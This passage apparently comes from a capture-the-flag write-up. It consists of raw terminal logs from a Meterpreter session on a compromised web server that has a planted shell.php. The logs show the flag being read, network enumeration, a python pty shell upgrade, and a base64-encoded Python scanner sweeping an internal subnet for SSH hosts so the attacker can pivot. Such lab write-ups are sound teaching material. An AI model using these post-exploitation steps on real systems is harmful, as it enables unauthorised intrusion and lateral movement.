100440/r--r-----  1024712  fil   2019-09-06 17:49:35 +0200  Glibc_Adventures-The_Forgotten_Chunks.pdf
100440/r--r-----  880      fil   2019-09-10 15:40:43 +0200  api.php
100440/r--r-----  17414    fil   2019-09-10 16:14:30 +0200  functions.php
100440/r--r-----  1508     fil   2019-09-09 11:16:55 +0200  home.php
100440/r--r-----  253      fil   2019-09-10 16:23:41 +0200  index.php
100440/r--r-----  21       fil   2019-09-06 17:49:35 +0200  info.php
100440/r--r-----  2226185  fil   2019-09-18 16:53:33 +0200  mobile-app-prototype.apk
100755/rwxr-xr-x  1111     fil   2020-10-10 15:27:47 +0200  shell.php
100755/rwxr-xr-x  866      fil   2020-10-10 15:24:49 +0200  tmpbsjex.php
100666/rw-rw-rw-  766      fil   2020-10-10 15:24:49 +0200  tmpupkap.php

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > shell
Process 486 created.
Channel 0 created.
whoami
www-data
cd /var/www
ls
flag.txt
html
cat flag.txt
{FLAG:Webapp:48a5f4bfef44c8e9b34b926051ad35a6}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

meterpreter > shell
Process 493 created.
Channel 1 created.

ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
14: eth0@if15: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0
       valid_lft forever preferred_lft forever
19: eth1@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
    link/ether 02:42:ac:10:01:0a brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.16.1.10/24 brd 172.16.1.255 scope global eth1
       valid_lft forever preferred_lft forever

ip route show
default via 172.18.0.1 dev eth0
172.16.1.0/24 dev eth1 proto kernel scope link src 172.16.1.10
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.2

ss
NetidState Recv-Q Send-Q               Local Address:Port    Peer Address:Port
u_strESTAB 8      0         /run/php/php7.2-fpm.sock 25209              * 0
u_strESTAB 0      0                                * 24380              * 24379
u_strESTAB 0      0                                * 24379              * 24380
u_strESTAB 0      0                                * 24282              * 24281
u_strESTAB 0      0                                * 24281              * 24282
tcp  ESTAB 0      0                       172.18.0.2:59268   10.8.106.222:4445

ip -s neigh
172.18.0.1 dev eth0 lladdr 02:42:9f:35:e8:97 ref 1 used 22/0/21 probes 1 REACHABLE

1
2
3
4

which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@app:~/html$

1
2
3
4
5
6
7
8

www-data@app:~/html$ echo 'aW1wb3J0IHNvY2tldAoKZm9yIGkgaW4gcmFuZ2UoMCwgMjU2KToKICAgIHNvY2sgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICBzb2NrLnNldHRpbWVvdXQoMC41KQogICAgaXAgPSAnMTcyLjE2LjEue30nLmZvcm1hdChpKQogICAgaWYgMCA9PSBzb2NrLmNvbm5lY3RfZXgoKGlwLCAyMikpOgogICAgICAgIHNvY2suY2xvc2UoKQogICAgICAgIHByaW50KGlwICsgJyAgIE9OJyAsIGZsdXNoPVRydWUpCiAgICBlbHNlOgogICAgICAgIHByaW50KGlwLCAgZmx1c2g9VHJ1ZSkK'  | base64 -d > arp.py
<aW50KGlwLCAgZmx1c2g9VHJ1ZSkK'  | base64 -d > arp.py
www-data@app:~/html$ python3 arp.py
python3 arp.py
172.16.1.0
172.16.1.1
172.16.1.2
172.16.1.3

1
2
3
4
5
6
7
8
9

www-data@app:~/html$ ip -s neigh
ip -s neigh
172.16.1.249 dev eth1  used 7/67/4 probes 6 FAILED
172.16.1.252 dev eth1  used 6/66/3 probes 6 FAILED
172.16.1.251 dev eth1  used 6/66/3 probes 6 FAILED
172.16.1.254 dev eth1  used 5/65/2 probes 6 FAILED
172.16.1.253 dev eth1  used 5/65/2 probes 6 FAILED
172.18.0.1 dev eth0 lladdr 02:42:9f:35:e8:97 ref 1 used 172/0/167 probes 1 REACHABLE
172.16.1.250 dev eth1  used 7/67/4 probes 6 FAILED